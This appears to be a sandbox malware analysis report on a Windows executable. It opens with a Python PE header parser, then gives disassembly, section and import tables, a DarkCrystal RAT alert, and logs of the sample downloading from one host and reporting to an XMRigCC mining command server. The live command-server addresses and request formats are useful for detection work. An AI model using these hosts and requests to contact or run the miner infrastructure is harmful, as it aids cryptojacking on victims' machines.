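import struct
from datetime import datetime, timezone
from typing import Dict, List

# Flag names from winnt.h (the subset relevant to the fields the report shows).
FILE_CHARACTERISTICS = {0x0002: "EXECUTABLE_IMAGE", 0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0400: "NO_SEH", 0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}
SUBSYSTEMS = {2: "windows gui", 3: "windows cui"}
# PE32 optional header from Magic through DllCharacteristics (72 bytes).
OPTIONAL_HEADER_FMT = "<HBB9I6H4I2H"


def _flags(value: int, table: Dict[int, str]) -> List[str]:
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe32_headers(image: bytes) -> Dict[str, object]:
    """Read the COFF and PE32 optional header fields that a static report lists."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    _, _, timestamp, _, _, opt_size, characteristics = struct.unpack_from("<HHIIIHH", image, e_lfanew + 4)
    opt = e_lfanew + 24
    f = struct.unpack_from(OPTIONAL_HEADER_FMT, image, opt)
    if f[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10B) is handled; PE32+ lays the fields out differently")
    # Data directory 4 is the Certificate Table; an Authenticode signature lives there,
    # so an empty entry is what "Digitally signed: false" means.
    (num_dirs,) = struct.unpack_from("<I", image, opt + 92)
    cert_size = 0
    if num_dirs > 4 and opt_size >= 96 + 5 * 8:
        cert_size = struct.unpack_from("<II", image, opt + 96 + 4 * 8)[1]
    return {
        "entry_point": f[6],
        "image_base": f[9],
        "timestamp": timestamp,
        "timestamp_utc": datetime.fromtimestamp(timestamp, timezone.utc).isoformat(),
        "file_characteristics": _flags(characteristics, FILE_CHARACTERISTICS),
        "dll_characteristics": _flags(f[23], DLL_CHARACTERISTICS),
        "subsystem": SUBSYSTEMS.get(f[22], f"unknown ({f[22]})"),
        "os_version": f"{f[12]}.{f[13]}",
        "image_version": f"{f[14]}.{f[15]}",     # reported as "File Version" (assumption)
        "subsystem_version": f"{f[16]}.{f[17]}",
        "signed": cert_size != 0,
    }


def build_sample_image() -> bytes:
    """Constructed header bytes carrying the values the report lists for
    IYXE4Uz61k.exe; not the sample's real bytes, and nothing follows the headers."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    optional = struct.pack(
        OPTIONAL_HEADER_FMT,
        0x10B, 0, 0,                                            # Magic, linker version
        0, 0, 0, 0x41F530, 0x1000, 0, 0x400000, 0x1000, 0x200,  # sizes, entry point, bases, alignments
        5, 1, 5, 1, 5, 1,                                       # OS, image ("File"), subsystem versions
        0, 0, 0, 0,                                             # Win32VersionValue, SizeOfImage, SizeOfHeaders, CheckSum
        2, 0x0040 | 0x0100 | 0x4000 | 0x8000,                   # windows gui; DYNAMIC_BASE|NX_COMPAT|GUARD_CF|TS_AWARE
    ) + struct.pack("<6I", 0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + b"\0" * (16 * 8)
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0x6220BF8D, 0, 0, len(optional), 0x0002 | 0x0100)
    return dos + b"PE\0\0" + coff + optional


if __name__ == "__main__":
    for key, value in parse_pe32_headers(build_sample_image()).items():
        print(f"{key}: {value:#x}" if isinstance(value, int) and not isinstance(value, bool) else f"{key}: {value}")
```

Pointing parse_pe32_headers at the real file (open it in binary mode and pass the bytes) reproduces the fields above; the only one that needs more than the headers is the import hash, which is computed over the import directory.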
Instruction
call 00007FF1CCCBC5DBh
jmp 00007FF1CCCBBEEDh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FF1CCCAED37h
mov dword ptr [esi], 004356D0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004356D8h
mov dword ptr [ecx], 004356D0h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004356B8h
push eax
call 00007FF1CCCBF37Fh
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007FF1CCCBC07Ch
push 0000000Ch
push esi
call 00007FF1CCCBB639h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FF1CCCAECB2h
push 0043BEF0h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FF1CCCBEE39h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FF1CCCBBFF8h
push 0043C0F4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FF1CCCBEE1Ch
int3
jmp 00007FF1CCCC08B7h
int3
int3
int3
int3
push 00422900h
push dword ptr fs:[00000000h]
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0xe050 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x73000 | 0x233c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x31bdc | 0x31c00 | 2831bb8b11e3209658a53131886cdf98 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x33000 | 0xaec0 | 0xb000 | 042f11346230ca5aa360727d9908e809 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x24720 | 0x1000 | 9670b581969e508258d8bc903025de5e | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x63000 | 0x190 | 0x200 | c83554035c63bb446c6208d0c8fa0256 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x64000 | 0xe050 | 0xe200 | d5ea19db2ac860286bc5d42e5dfbbd0a | False | 0.6343853705752213 | data | 6.802173495258787 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x73000 | 0x233c | 0x2400 | 40b5e17755fd6fdd34de06e5cdb7f711 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x64644 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | | | 1.0027729636048528
PNG | 0x6518c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | | | 0.9363390441839495
RT_ICON | 0x66738 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | | | 0.47832369942196534
RT_ICON | 0x66ca0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | | | 0.5410649819494585
RT_ICON | 0x67548 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | | | 0.4933368869936034
RT_ICON | 0x683f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | | | 0.5390070921985816
RT_ICON | 0x68858 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | | | 0.41393058161350843
RT_ICON | 0x69900 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | | | 0.3479253112033195
RT_ICON | 0x6bea8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9809269502193401
RT_DIALOG | 0x6fc1c | 0x2ba | data | | | 0.5286532951289399
RT_DIALOG | 0x6fed8 | 0x13a | data | | | 0.6560509554140127
RT_DIALOG | 0x70014 | 0xf2 | data | | | 0.71900826446281
RT_DIALOG | 0x70108 | 0x14a | data | | | 0.6
RT_DIALOG | 0x70254 | 0x314 | data | | | 0.47588832487309646
RT_DIALOG | 0x70568 | 0x24a | data | | | 0.6262798634812287
RT_STRING | 0x707b4 | 0x1fc | data | | | 0.421259842519685
RT_STRING | 0x709b0 | 0x246 | data | | | 0.41924398625429554
RT_STRING | 0x70bf8 | 0x1a6 | data | | | 0.514218009478673
RT_STRING | 0x70da0 | 0xdc | data | | | 0.65
RT_STRING | 0x70e7c | 0x47c | data | | | 0.38414634146341464
RT_STRING | 0x712f8 | 0x164 | data | | | 0.5056179775280899
RT_STRING | 0x7145c | 0x110 | data | | | 0.5772058823529411
RT_STRING | 0x7156c | 0x158 | data | | | 0.4563953488372093
RT_STRING | 0x716c4 | 0xe8 | data | | | 0.5948275862068966
RT_STRING | 0x717ac | 0xe6 | data | | | 0.5695652173913044
RT_GROUP_ICON | 0x71894 | 0x68 | data | | | 0.7019230769230769
RT_MANIFEST | 0x718fc | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | | | 0.3957333333333333
DLL | Import
KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-08T23:02:43.286483+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49741 | 193.32.162.64 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                  Dec 8, 2024 23:03:24.690720081 CET808149795185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:25.791791916 CET808149795185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:25.791812897 CET808149795185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:25.791877985 CET497958081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:25.791955948 CET808149795185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:25.792002916 CET497958081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:25.795999050 CET497958081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:25.915273905 CET808149795185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:33.709913969 CET498208081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:33.829355955 CET808149820185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:33.829484940 CET498208081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:33.834790945 CET498208081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:33.954754114 CET808149820185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:33.954844952 CET498208081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:34.074161053 CET808149820185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:35.344357014 CET808149820185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:35.344598055 CET808149820185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:35.344644070 CET498208081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:35.344691992 CET808149820185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:35.344733000 CET498208081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:35.348838091 CET498208081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:35.468008041 CET808149820185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:43.712102890 CET498428081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:43.831542969 CET808149842185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:43.833384991 CET498428081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:43.833611012 CET498428081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:43.952907085 CET808149842185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:43.955780029 CET498428081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:44.075453043 CET808149842185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:45.172362089 CET808149842185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:45.172776937 CET808149842185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:45.172904968 CET808149842185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:45.172926903 CET498428081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:45.172954082 CET498428081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:45.176467896 CET498428081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:45.295722008 CET808149842185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:46.168342113 CET8149735185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:46.349220991 CET4973581192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:52.118530989 CET8149735185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:52.161833048 CET4973581192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:54.459135056 CET498638081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:54.578486919 CET808149863185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:54.578557968 CET498638081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:54.578732967 CET498638081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:54.697977066 CET808149863185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:54.698021889 CET498638081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:54.817316055 CET808149863185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:55.916826963 CET808149863185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:55.916939974 CET808149863185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:55.917011976 CET808149863185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:03:55.917124987 CET498638081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:55.919910908 CET498638081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:55.920856953 CET498638081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:03:56.040173054 CET808149863185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:03.860694885 CET498888081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:03.980986118 CET808149888185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:03.981085062 CET498888081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:03.994983912 CET498888081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:04.114224911 CET808149888185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:04.114299059 CET498888081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:04.233620882 CET808149888185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:05.495356083 CET808149888185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:05.495440006 CET808149888185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:05.495589972 CET498888081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:05.499186039 CET498888081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:05.618407011 CET808149888185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:11.127850056 CET8149735185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:11.349302053 CET4973581192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:13.912282944 CET499098081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:14.031693935 CET808149909185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:14.031776905 CET499098081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:14.032143116 CET499098081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:14.151348114 CET808149909185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:14.151420116 CET499098081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:14.270771980 CET808149909185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:15.378420115 CET808149909185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:15.378621101 CET808149909185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:15.378663063 CET499098081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:15.378746986 CET808149909185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:15.378793001 CET499098081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:15.382580042 CET499098081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:15.501806021 CET808149909185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:21.127726078 CET8149735185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:21.364964962 CET4973581192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:23.882255077 CET499308081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:24.003197908 CET808149930185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:24.003849983 CET499308081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:24.004045963 CET499308081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:24.123660088 CET808149930185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:24.123732090 CET499308081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:24.243074894 CET808149930185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:25.403692007 CET808149930185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:25.403884888 CET808149930185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:25.403927088 CET499308081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:25.404093981 CET808149930185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:25.404135942 CET499308081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:25.407567978 CET499308081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:25.526783943 CET808149930185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:31.127914906 CET8149735185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:31.349370956 CET4973581192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:33.884744883 CET499518081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:34.004157066 CET808149951185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:34.004375935 CET499518081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:34.004443884 CET499518081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:34.123708963 CET808149951185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:04:34.123887062 CET499518081192.168.2.4185.17.0.139
                                                                                                                                                                                                  Dec 8, 2024 23:04:34.243333101 CET808149951185.17.0.139192.168.2.4
                                                                                                                                                                                                  Dec 8, 2024 23:06:08.365968943 CET4973581192.168.2.4185.17.0.139
• 45.137.64.40
• 185.17.0.139:8081
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49738 | 45.137.64.40 | 80 | 3272 | C:\Windows\Tasks\MSTask.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 23:02:26.520373106 CET | 155 | OUT | GET /miners/v.txt HTTP/1.1
    Host: 45.137.64.40
    User-Agent: python-requests/2.28.1
    Accept-Encoding: gzip, deflate
    Accept: */*
    Connection: keep-alive

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49739 | 185.17.0.139 | 8081 | 2044 | C:\Windows\Tasks\ApplicationsFrameHost.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 23:02:33.225963116 CET | 307 | OUT | POST /client/setClientConfig?clientId=124406 HTTP/1.1
    Accept: *//*
    Accept: application/json
    Authorization: Bearer mySecret
    Connection: close
    Content-Length: 3462
    Content-Type: application/json
    Host: 185.17.0.139:8081
    User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
Dec 8, 2024 23:02:34.584167004 CET | 249 | IN | HTTP/1.1 200 OK
    Access-Control-Allow-Headers: Content-Type, Authorization
    Access-Control-Allow-Methods: POST, GET, OPTIONS
    Access-Control-Allow-Origin: *
    Connection: close
    Content-Length: 0
    WWW-Authenticate: Basic
    WWW-Authenticate: Bearer

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49740 | 185.17.0.139 | 8081 | 2044 | C:\Windows\Tasks\ApplicationsFrameHost.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 23:02:34.708420992 CET | 307 | OUT | POST /client/setClientStatus?clientId=124406 HTTP/1.1
    Accept: *//*
    Accept: application/json
    Authorization: Bearer mySecret
    Connection: close
    Content-Length: 2780
    Content-Type: application/json
    Host: 185.17.0.139:8081
    User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
Dec 8, 2024 23:02:36.064941883 CET | 282 | IN | HTTP/1.1 200 OK
    Access-Control-Allow-Headers: Content-Type, Authorization
    Access-Control-Allow-Methods: POST, GET, OPTIONS
    Access-Control-Allow-Origin: *
    Connection: close
    Content-Length: 52
    Content-Type: application/json
    WWW-Authenticate: Basic
    WWW-Authenticate: Bearer

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49742 | 185.17.0.139 | 8081 | 2044 | C:\Windows\Tasks\ApplicationsFrameHost.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 23:02:43.254406929 CET | 306 | OUT | POST /client/setClientStatus?clientId=124406 HTTP/1.1
    Accept: *//*
    Accept: application/json
    Authorization: Bearer mySecret
    Connection: close
    Content-Length: 908
    Content-Type: application/json
    Host: 185.17.0.139:8081
    User-Agent: XMRigCC/3.4.0 (Windows NT 10.0; Win64; x64) libuv/1.44.2 msvc/2019
Dec 8, 2024 23:02:44.728347063 CET | 282 | IN | HTTP/1.1 200 OK
    Access-Control-Allow-Headers: Content-Type, Authorization
    Access-Control-Allow-Methods: POST, GET, OPTIONS
    Access-Control-Allow-Origin: *
    Connection: close
    Content-Length: 52
    Content-Type: application/json
    WWW-Authenticate: Basic
    WWW-Authenticate: Bearer

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49744 | 185.17.0.139 | 8081 | 2044 | C:\Windows\Tasks\ApplicationsFrameHost.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2024 23:02:53.474147081 CET | 307 | OUT | POST /client/setClientStatus?clientId=124406 HTTP/1.1
    Accept: *//*
    Accept: application/json
    Authorization: Bearer mySecret
    Connection: close
    Content-Length: 1020
    Content-Type: application/json
